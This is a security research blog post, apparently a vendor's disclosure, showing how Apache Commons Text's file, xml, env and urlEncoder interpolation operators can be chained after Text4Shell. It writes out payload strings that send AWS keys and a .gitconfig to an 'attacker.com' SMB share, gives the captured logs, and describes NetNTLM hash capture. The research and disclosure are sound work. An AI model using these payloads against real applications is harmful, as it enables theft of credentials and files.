Text4Shell++ - Where There’s Smoke, There’s Fire

(Or at least some ash)

As part of our Attack Surface Management capabilities delivered through the watchTowr Platform, we analyse vulnerabilities in technology that is likely to be prevalent across the attack surfaces of our clients. This enables proactive defense for organisations leveraging the watchTowr Platform, and gives forward visibility of vulnerabilities while we liaise with vendors and projects to have identified vulnerabilities remediated.

In our previous post about the 'Text4Shell' vulnerabilities (tracked as CVE-2022-44889), we went through the bug itself, and why it was dangerous.

You'll remember the discussion focussed on three interpolation operators - the most dangerous being script, which allowed for the execution of arbitrary JavaScript. Two other interpolation operators, dns and url, allowed us to exfiltrate data - such as environment variables -  by embedding this data into requests made to remote servers.

However - while being the generally nefarious and curious people that we are - we noticed some further interesting interpolation operators, which could potentially be abused by an attacker and had not been patched out. The documentation in StringSubstitutor.java helpfully lists them:

final String text = interpolator.replace(
  "Base64 Decoder:        ${base64Decoder:SGVsbG9Xb3JsZCE=}\n"
+ "Base64 Encoder:        ${base64Encoder:HelloWorld!}\n"
+ "Java Constant:         ${const:java.awt.event.KeyEvent.VK_ESCAPE}\n"
+ "Date:                  ${date:yyyy-MM-dd}\n"
+ "Environment Variable:  ${env:USERNAME}\n"
+ "File Content:          ${file:UTF-8:src/test/resources/document.properties}\n"
+ "Java:                  ${java:version}\n"
+ "Localhost:             ${localhost:canonical-name}\n"
+ "Properties File:       ${properties:src/test/resources/document.properties::mykey}\n"
+ "Resource Bundle:       ${resourceBundle:org.apache.commons.text.example.testResourceBundleLookup:mykey}\n"
+ "System Property:       ${sys:user.dir}\n"
+ "URL Decoder:           ${urlDecoder:Hello%20World%21}\n"
+ "URL Encoder:           ${urlEncoder:Hello World!}\n"
+ "XML XPath:             ${xml:src/test/resources/document.xml:/root/path/to/node}\n");

Most of these are benign, and of no use to a potential attacker, but our attention was quickly drawn to the file and xml interpolation operators, both of which allow access to an arbitrary file. Other operators, such as env, which allows access to environment variables, also look like they could hold some potential for abuse - but how?

Well, it turns out that they can be useful for transferring data from a victim's server to an attacker's host, and if they can be chained together, they can both retrieve sensitive data, and send it to an attacker.

Exfiltration Of Environmental Variables

The best example of an operator that lends itself to abuse is the file operator, which is designed to simply read the contents of a specified file. A remote attacker can use this, specifying a UNC path to a host they control, and embed secret information within the path.

For example, consider the following (benign) interpolation:

final String logmsg = interpolator.replace("The message is: ${file:UTF-8:\\attacker.com\\foo\\bar}\n");

This will attempt to retrieve a file from the host at attacker.com from a share named foo. This remote host can run an SMB server, and watch the logs for requests of this file:

# tail /var/log/samba/log.host  
 process_usershare_file: stat of /var/lib/samba/usershares/foo failed. Permission denied
 

If the application running on the target has enabled the option EnableSubstitutionInVariables, then it is straightfoward to use this functionality to leak sensitive information. This option enables recursive interpolation, and so it is possible to use one interpolation operator to gain access to sensitive information, such as an environment variable, and then use a second interpolation operator to send it to an attacker.

For example, consider a host with a secret stored in an environment variable - let's say AWS_ACCESS_KEY_ID. The env interpolation operator can be used to view this:

final String logmsg = interpolator.replace("The message is: ${env:AWS_ACCESS_KEY_ID}\n"); 

And then the string can be wrapped in a file request, order to send it to an attacker.

final String logmsg = interpolator.replace("The message is: ${file:\\\\attacker.com\\${env:AWS_ACCESS_KEY_ID}}\n"); 

The env variable will first be expanded, and then the request will be sent to the attacker, who is monitoring requests to their server at attacker.com:

# tail /var/log/samba/log.host  
 process_usershare_file: stat of /var/lib/samba/usershares/akiaiosfodnn7example failed. Permission denied
 

For those environmental variables that contain special characters, the urlEncoder interpolator comes in handy. For example, AWS_SECRET_KEY often contains slashes, which can affect our exfiltration. We can URL-encode them like this:

final String logmsg = interpolator.replace("The message is: ${file:\\\\attacker.com\\${urlEncoder:${env:AWS_ACCESS_KEY_ID}}}\n"); 

And simply pluck them from our smbd log.

# tail /var/log/samba/log.host
 process_usershare_file: share name wjalrxutnfemi%2fk7mdeng%2fbpxrficyexamplekey contains invalid characters (any of %<>*?|/\+=;:",)

This is not the only interpolation operator which fetches a file - the xml operator, designed to load an XML document and perform an xpath query, also exposes this functionality:

final String logmsg = interpolator.replace("The message is: ${xml:\\\\192.168.182.138\\${urlEncoder:${env:AWS_ACCESS_KEY_ID}}:/}\n");

Exfiltrating Arbitrary Files

These two operators, file and xml, are not only useful for exfiltrating files, but also for exposing files themselves. We can nest two file interpolations - one to retrieve a file from the file target system's filesystem, and another to send it to our host.

For example, we'll fetch my .gitconfig file:

final String logmsg = interpolator.replace("The message is: ${file:UTF-8:..\\..\\..\\..\\Users\\aliz\\.gitconfig}\n");

And send it to our attacker host, URL-encoded.

final String logmsg = interpolator.replace("The message is: ${file:\\\\attacker.com\\${urlEncoder:${file:UTF-8:..\\..\\..\\..\\Users\\aliz\\.gitconfig}}}\n");

The result:

# tail /var/log/samba/log.host  
 process_usershare_file: share name %5buser%5d%0a%09email+%3d+aliz%40watchtowr.com%0a%09name+%3d+aliz+hammond%0a%5bcredential+%22http%3a%2f%2fredacted%22%5d%0a%09provider+%3d+bitbucket%0a contains invalid characters (any of %<>*?|/\+=;:",)

Forcing Negotiation - AKA, Give Me Credz

There is another consideration, even when EnableSubstitutionInVariables is not set, and that is the threat posed by the target simply connecting to an attacker-controlled host via SMB.

Those well-versed in lateral movement will be aware that, upon connecting to the attacker-controller host, the target machine will attempt to negotiate authentication parameters before attempting to fetch any files. As part of this process, hashes of various tokens, including the 'NetNTLMv1' and 'NetNTLMv2' hashes, will be sent to the attacker.

These two hashes can then be loaded into a tool such as impacket and replayed, allowing the attacker to assume the identity - under some circumstances - of the account that first performed the string interpolation.

This is a much more serious attack, and it requires only that an attacker can interpolate a string of their choosing - there is no requirement that they are able to read the interpolated output.

Other Considerations

There are other, more minor, instances in which these interpolation operators may assist an attacker.

Firstly, since the target machine will perform a DNS lookup before connecting to an UNC share, it may permit an attacker to map internal infrastructure by querying an otherwise-inaccessible DNS server.

Secondly, the ability to retrieve files specified by UNC path is not limited to the targeted host. If the target host has access to resources on other hosts, file interpolations can be chained to retrieve files from these hosts.

Isn't this all by design?

There's certainly an argument to be made that the software is working as intended, and that this behaviour is simply "by design". However, we posit that this is not the case, since the functions that use these string interpolation functions, we believe, are designed to handle untrusted input (as evidenced by the attention garnered by the original Text4Shell vulnerability, and subsequent patch).

While useful for programmers, we still believe that this functionality (particularly the ability to specify UNC paths) allows attackers to perform dangerous functions and should be treated as a security vulnerability.

As with all vulnerabilities we discover, we reached out to the vendor (in this case Apache) via their security contact. After some initial confusion, they declined to treat these issues as security-sensitive, expanding that they don't consider these string interpolation functions as safe to expose to malicious input, and advising that the responsibility lies with the application to use these functions only after sanitising input.

Update, 9th September: Apache have further clarified their position via email. They advise that the disabling of operators such as script was done not because they view such as a security hole, but rather to reduce the impact of exploitation of application-layer vulnerabilities that call these functions dangerously, as part of a defence-in-depth "harm reduction" approach. They also comment that they attribute the media attention around the original Text4Shell "bugs" to the high CVSS score, which was itself a result of NVD's rule system not accurately expressing the severity of the vulnerability, since the rule system doesn't really handle bugs in libraries very well. They also directed me to their vulnerabilities page which explains things well:

.. the Apache Commons Text team have decided to update the configuration to be more "secure by default", so that the impact of a failure to validate inputs is mitigated and will not give an attacker access to these interpolators. However, it is still recommended that users treat untrusted input with care.

Remediation

Because of Apache's stance that this behaviour is expected, mitigation is limited to following best-practices, such as ensuring outbound packet filtering is configured to limit the potential for data exfiltration. If possible, we also advise that applications are audited for the potentially-hazardous EnableSubstitutionInVariables option, although we note that omission of this option does not completely eliminate exposure.

Conclusion

We've seen that, although some dangerous string interpolation operators have been disabled, others still remain.

If attackers can supply text to be interpolated, and you either present the result, or have enabled the EnableSubstitutionInVariables option, attackers would be able to:

  • Read sensitive environment variables,
  • Read files from the filesystem,
  • Read files from other hosts via SMB,
  • Perform DNS lookups to arbitrary hosts.

If attackers are able to supply text to be interpolated, but are not able to see the result, then they are able to:

  • Cause DNS lookups (though not read the result), which may allow them to infer information via timing,
  • Force the target host to negotiate an SMB connection (and thus leak its NetNTLM hashes).

This rapid analysis allowed watchTowr to rapidly and proactively enumerate vulnerable systems across our client base, while now continuously testing for the vulnerability - ahead of public release of information for the wider community.

At watchTowr, we believe continuous security testing is the future, enabling the rapid identification of holistic high-impact vulnerabilities that affect your organisation.

If you'd like to learn more about how the watchTowr Platform, our Attack Surface Management and Continuous Automated Red Teaming solution, can support your organisation, please get in touch.